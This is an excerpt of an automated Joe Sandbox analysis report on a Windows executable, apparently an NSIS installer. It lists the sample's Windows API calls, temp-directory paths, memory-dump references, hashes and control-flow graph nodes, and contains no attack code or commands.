                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CharNext
                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsaC158.tmp
                                                      • API String ID: 3213498283-2599538234
                                                      • Opcode ID: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                      • Instruction ID: 37941c8e81507efb3cd3a011d4506580e18aa69eefbcae33377864b38d05d7c2
                                                      • Opcode Fuzzy Hash: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                      • Instruction Fuzzy Hash: 83F0F061D8061199DA31F6584C40E7766BCEB54360B06803BEA02B32C1D7BC88E182DA
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403652,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 00405F77
                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403652,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 00405F81
                                                      • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405F93
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F71
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrcatlstrlen
                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 2659869361-4083868402
                                                      • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                      • Instruction ID: 335bc096d8d08ccdb4617666140afd44cda2f442d884a3fcf06d2b2a94fa9456
                                                      • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                      • Instruction Fuzzy Hash: 42D0A731101A34EAC2117B448C04CDF629C9F46344341483BF101B31A1CB7D5DA287FD
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 6E9F1171
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 6E9F11E3
                                                      • GlobalFree.KERNEL32 ref: 6E9F124A
                                                      • GlobalFree.KERNEL32(?), ref: 6E9F129B
                                                      • GlobalFree.KERNEL32(00000000), ref: 6E9F12B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2450949235.000000006E9F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9F0000, based on PE: true
                                                      • Associated: 00000000.00000002.2450757132.000000006E9F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451038784.000000006E9F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451083781.000000006E9F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6e9f0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$Alloc
                                                      • String ID:
                                                      • API String ID: 1780285237-0
                                                      • Opcode ID: cd06685ce72c7f693efcb4ffaa84c0d774af568ca244feb638b46b9bec28c783
                                                      • Instruction ID: 8db1d174f9927442db59552081c1671a5da29156de37956130d8377f7820acd7
                                                      • Opcode Fuzzy Hash: cd06685ce72c7f693efcb4ffaa84c0d774af568ca244feb638b46b9bec28c783
                                                      • Instruction Fuzzy Hash: A7517DF5504602DFDB00CFEAE844AA57BA8FF47314B088519E919DB212E734DD0ACF94
                                                      APIs
                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaC158.tmp\System.dll), ref: 004026BA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsaC158.tmp$C:\Users\user\AppData\Local\Temp\nsaC158.tmp\System.dll
                                                      • API String ID: 1659193697-516789974
                                                      • Opcode ID: 0b41287631d18e2d28a56846eef1e8605d4441d913272003cd6f8d0be4e33a07
                                                      • Instruction ID: 3a980f7409dbeac528cd7030d6b505637954cb723df09773b9ac7431f40d283a
                                                      • Opcode Fuzzy Hash: 0b41287631d18e2d28a56846eef1e8605d4441d913272003cd6f8d0be4e33a07
                                                      • Instruction Fuzzy Hash: BD11EB72B00206A7CB00BBB18E4AA9E77659F50758F21443FF502B61D0DAFD8991635E
                                                      APIs
                                                      • CloseHandle.KERNEL32(000002E4,C:\Users\user\AppData\Local\Temp\,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C94
                                                      • CloseHandle.KERNEL32(000002EC,C:\Users\user\AppData\Local\Temp\,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403CA8
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\nsaC158.tmp, xrefs: 00403CB8
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C87
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsaC158.tmp
                                                      • API String ID: 2962429428-2081533026
                                                      • Opcode ID: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                      • Instruction ID: 6bfdaf564fb6f4d857381f61ee43f4b3e7b9b57b480fcef53b70eb5bee5fd527
                                                      • Opcode Fuzzy Hash: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                      • Instruction Fuzzy Hash: ADE0863150471896D5346F7CAF4D9853B185F413357258327F078F20F0C738D95A5AAD
                                                      APIs
                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403161,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\0GuwV0t2UU.exe,C:\Users\user\Desktop\0GuwV0t2UU.exe,80000000,00000003), ref: 00405FC3
                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403161,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\0GuwV0t2UU.exe,C:\Users\user\Desktop\0GuwV0t2UU.exe,80000000,00000003), ref: 00405FD3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrlen
                                                      • String ID: C:\Users\user\Desktop
                                                      • API String ID: 2709904686-1876063424
                                                      • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                      • Instruction ID: 38d9290afe44bb03d7cf08b54fe4d5b58535dca9612c3dc8604b8734ddeb262b
                                                      • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                      • Instruction Fuzzy Hash: 3AD05EB2411921DAD3126704DD01D9F77ACEF12300746482AE440A7161D7785C8186AC
                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040611F
                                                      • CharNextA.USER32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406130
                                                      • lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                      • Instruction ID: 5f3436636367d0d5bc92f6b0e419d408aad35ecbe6557c54d873c5627a92c34c
                                                      • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                      • Instruction Fuzzy Hash: E4F0BB35604414FFC702DFA5DD00D9EBBA8EF46350B2640B9F841FB211D674DE129B99

                                                      Execution Graph

                                                      Execution Coverage:0%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:100%
                                                      Total number of Nodes:1
                                                      Total number of Limit Nodes:0
                                                      execution_graph 82248 37842df0 LdrInitializeThunk

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1 378435c0-378435cc LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c7fb157c4b0a0dc8d2feff9e97ec4d5cdb0f7e2ece098fd2f7f62b3f2a25e92b
                                                      • Instruction ID: ed8411ca0fe17e94a8905e9fba3c53cb7bf4bfed89b6c8cb44f1a2efb4b4685e
                                                      • Opcode Fuzzy Hash: c7fb157c4b0a0dc8d2feff9e97ec4d5cdb0f7e2ece098fd2f7f62b3f2a25e92b
                                                      • Instruction Fuzzy Hash: D090027160550816D10171594514706140547E0211F65C813B0424568E87958A5979A3

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 37842df0-37842dfc LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1f6948d13ea861e5de80717fb70a209947cee641bfc21e62beb2d404dd830907
                                                      • Instruction ID: 8386a35f31e9eb433847e4433c00c841ea43f936fe83a93bb4a2267035629c92
                                                      • Opcode Fuzzy Hash: 1f6948d13ea861e5de80717fb70a209947cee641bfc21e62beb2d404dd830907
                                                      • Instruction Fuzzy Hash: E290027120140827D11271594504707040947E0251F95C813B0424558E96568A5AB522

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 553 378a94e0-378a9529 554 378a952b-378a9530 553->554 555 378a9578-378a9587 553->555 556 378a9534-378a953a 554->556 555->556 557 378a9589-378a958e 555->557 558 378a9540-378a9564 call 37849020 556->558 559 378a9695-378a96bd call 37849020 556->559 560 378a9d13-378a9d27 call 37844c30 557->560 567 378a9593-378a9634 GetPEB call 378adc65 558->567 568 378a9566-378a9573 call 378c972b 558->568 569 378a96bf-378a96da call 378a9d2a 559->569 570 378a96dc-378a9712 559->570 579 378a9652-378a9667 567->579 580 378a9636-378a9644 567->580 581 378a967d-378a9690 RtlDebugPrintTimes 568->581 571 378a9714-378a9716 569->571 570->571 571->560 576 378a971c-378a9731 RtlDebugPrintTimes 571->576 576->560 587 378a9737-378a973e 576->587 579->581 583 378a9669-378a966e 579->583 580->579 582 378a9646-378a964b 580->582 581->560 582->579 585 378a9673-378a9676 583->585 586 378a9670 583->586 585->581 586->585 587->560 589 378a9744-378a975f 587->589 590 378a9763-378a9774 call 378aa808 589->590 593 378a977a-378a977c 590->593 594 378a9d11 590->594 593->560 595 378a9782-378a9789 593->595 594->560 596 378a978f-378a9794 595->596 597 378a98fc-378a9902 595->597 600 378a97bc 596->600 601 378a9796-378a979c 596->601 598 378a9908-378a9937 call 37849020 597->598 599 378a9a9c-378a9aa2 597->599 615 378a9939-378a9944 598->615 616 378a9970-378a9985 598->616 604 378a9af4-378a9af9 599->604 605 378a9aa4-378a9aad 599->605 602 378a97c0-378a9811 call 37849020 RtlDebugPrintTimes 600->602 601->600 606 378a979e-378a97b2 601->606 602->560 642 378a9817-378a981b 602->642 610 378a9ba8-378a9bb1 604->610 611 378a9aff-378a9b07 604->611 605->590 609 378a9ab3-378a9aef call 37849020 605->609 612 378a97b8-378a97ba 606->612 613 378a97b4-378a97b6 606->613 636 378a9ce9 609->636 610->590 617 378a9bb7-378a9bba 610->617 619 378a9b09-378a9b0d 611->619 620 378a9b13-378a9b3d call 378a8513 611->620 612->602 613->602 622 378a994f-378a996e 615->622 623 378a9946-378a994d 615->623 627 378a9991-378a9998 616->627 628 378a9987-378a9989 616->628 624 378a9c7d-378a9cb4 call 37849020 617->624 625 378a9bc0-378a9c0a 617->625 619->610 619->620 639 378a9d08-378a9d0c 620->639 640 378a9b43-378a9b9e call 37849020 RtlDebugPrintTimes 620->640 635 378a99d9-378a99f6 RtlDebugPrintTimes 622->635 623->622 651 378a9cbb-378a9cc2 624->651 652 378a9cb6 624->652 633 378a9c0c 625->633 634 378a9c11-378a9c1e 625->634 630 378a99bd-378a99bf 627->630 637 378a998b-378a998d 628->637 638 378a998f 628->638 643 378a999a-378a99a4 630->643 644 378a99c1-378a99d7 630->644 633->634 645 378a9c2a-378a9c2d 634->645 646 378a9c20-378a9c23 634->646 635->560 667 378a99fc-378a9a1f call 37849020 635->667 647 378a9ced 636->647 637->627 638->627 639->590 640->560 685 378a9ba4 640->685 653 378a986b-378a9880 642->653 654 378a981d-378a9825 642->654 648 378a99ad 643->648 649 378a99a6 643->649 644->635 657 378a9c39-378a9c7b 645->657 658 378a9c2f-378a9c32 645->658 646->645 656 378a9cf1-378a9d06 RtlDebugPrintTimes 647->656 661 378a99af-378a99b1 648->661 649->644 659 378a99a8-378a99ab 649->659 662 378a9ccd 651->662 663 378a9cc4-378a9ccb 651->663 652->651 666 378a9886-378a9894 653->666 664 378a9852-378a9869 654->664 665 378a9827-378a9850 call 378a8513 654->665 656->560 656->639 657->656 658->657 659->661 669 378a99bb 661->669 670 378a99b3-378a99b5 661->670 671 378a9cd1-378a9cd7 662->671 663->671 664->666 673 378a9898-378a98ef call 37849020 RtlDebugPrintTimes 665->673 666->673 683 378a9a3d-378a9a58 667->683 684 378a9a21-378a9a3b 667->684 669->630 670->669 678 378a99b7-378a99b9 670->678 679 378a9cd9-378a9cdc 671->679 680 378a9cde-378a9ce4 671->680 673->560 689 378a98f5-378a98f7 673->689 678->630 679->636 680->647 686 378a9ce6 680->686 687 378a9a5d-378a9a8b RtlDebugPrintTimes 683->687 684->687 685->610 686->636 687->560 691 378a9a91-378a9a97 687->691 689->639 691->617
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: $ $0
                                                      • API String ID: 3446177414-3352262554
                                                      • Opcode ID: c8203bc867a34d6786c12ac4cc9c76c3946ea6061db14d212f29b4c8fde30f01
                                                      • Instruction ID: 0ca2c7fb26c67d87cccd285c17f9a5c70f6aa94d4d7e9321d6b3bc07e01c3dec
                                                      • Opcode Fuzzy Hash: c8203bc867a34d6786c12ac4cc9c76c3946ea6061db14d212f29b4c8fde30f01
                                                      • Instruction Fuzzy Hash: 813213B160C3818FE350CF68C484B5BBBE4BB98354F14492EF59987250DB79E94ACF52

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1296 378b0274-378b0296 call 37857e54 1299 378b0298-378b02b0 RtlDebugPrintTimes 1296->1299 1300 378b02b5-378b02cd call 377f76b2 1296->1300 1304 378b0751-378b0760 1299->1304 1305 378b02d3-378b02e9 1300->1305 1306 378b06f7 1300->1306 1308 378b02eb-378b02ee 1305->1308 1309 378b02f0-378b02f2 1305->1309 1307 378b06fa-378b074e call 378b0766 1306->1307 1307->1304 1311 378b02f3-378b030a 1308->1311 1309->1311 1313 378b06b1-378b06ba GetPEB 1311->1313 1314 378b0310-378b0313 1311->1314 1316 378b06d9-378b06de call 377fb970 1313->1316 1317 378b06bc-378b06d7 GetPEB call 377fb970 1313->1317 1314->1313 1318 378b0319-378b0322 1314->1318 1326 378b06e3-378b06f4 call 377fb970 1316->1326 1317->1326 1319 378b033e-378b0351 call 378b0cb5 1318->1319 1320 378b0324-378b033b call 3780ffb0 1318->1320 1330 378b035c-378b0370 call 377f758f 1319->1330 1331 378b0353-378b035a 1319->1331 1320->1319 1326->1306 1335 378b05a2-378b05a7 1330->1335 1336 378b0376-378b0382 GetPEB 1330->1336 1331->1330 1335->1307 1339 378b05ad-378b05b9 GetPEB 1335->1339 1337 378b03f0-378b03fb 1336->1337 1338 378b0384-378b0387 1336->1338 1340 378b04e8-378b04fa call 378127f0 1337->1340 1341 378b0401-378b0408 1337->1341 1342 378b0389-378b03a4 GetPEB call 377fb970 1338->1342 1343 378b03a6-378b03ab call 377fb970 1338->1343 1344 378b05bb-378b05be 1339->1344 1345 378b0627-378b0632 1339->1345 1364 378b0590-378b059d call 378b11a4 call 378b0cb5 1340->1364 1365 378b0500-378b0507 1340->1365 1341->1340 1348 378b040e-378b0417 1341->1348 1354 378b03b0-378b03d1 call 377fb970 GetPEB 1342->1354 1343->1354 1351 378b05dd-378b05e2 call 377fb970 1344->1351 1352 378b05c0-378b05db GetPEB call 377fb970 1344->1352 1345->1307 1349 378b0638-378b0643 1345->1349 1357 378b0419-378b0429 1348->1357 1358 378b0438-378b043c 1348->1358 1349->1307 1359 378b0649-378b0654 1349->1359 1363 378b05e7-378b05fb call 377fb970 1351->1363 1352->1363 1354->1340 1383 378b03d7-378b03eb 1354->1383 1357->1358 1366 378b042b-378b0435 call 378bdac6 1357->1366 1368 378b044e-378b0454 1358->1368 1369 378b043e-378b044c call 37833bc9 1358->1369 1359->1307 1367 378b065a-378b0663 GetPEB 1359->1367 1394 378b05fe-378b0608 GetPEB 1363->1394 1364->1335 1373 378b0509-378b0510 1365->1373 1374 378b0512-378b051a 1365->1374 1366->1358 1377 378b0682-378b0687 call 377fb970 1367->1377 1378 378b0665-378b0680 GetPEB call 377fb970 1367->1378 1370 378b0457-378b0460 1368->1370 1369->1370 1381 378b0472-378b0475 1370->1381 1382 378b0462-378b0470 1370->1382 1373->1374 1385 378b0538-378b053c 1374->1385 1386 378b051c-378b052c 1374->1386 1391 378b068c-378b06ac call 378a86ba call 377fb970 1377->1391 1378->1391 1392 378b0477-378b047e 1381->1392 1393 378b04e5 1381->1393 1382->1381 1383->1340 1397 378b053e-378b0551 call 37833bc9 1385->1397 1398 378b056c-378b0572 1385->1398 1386->1385 1395 378b052e-378b0533 call 378bdac6 1386->1395 1391->1394 1392->1393 1401 378b0480-378b048b 1392->1401 1393->1340 1394->1307 1403 378b060e-378b0622 1394->1403 1395->1385 1410 378b0563 1397->1410 1411 378b0553-378b0561 call 3782fe99 1397->1411 1402 378b0575-378b057c 1398->1402 1401->1393 1407 378b048d-378b0496 GetPEB 1401->1407 1402->1364 1408 378b057e-378b058e 1402->1408 1403->1307 1413 378b0498-378b04b3 GetPEB call 377fb970 1407->1413 1414 378b04b5-378b04ba call 377fb970 1407->1414 1408->1364 1416 378b0566-378b056a 1410->1416 1411->1416 1422 378b04bf-378b04dd call 378a86ba call 377fb970 1413->1422 1414->1422 1416->1402 1422->1393
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
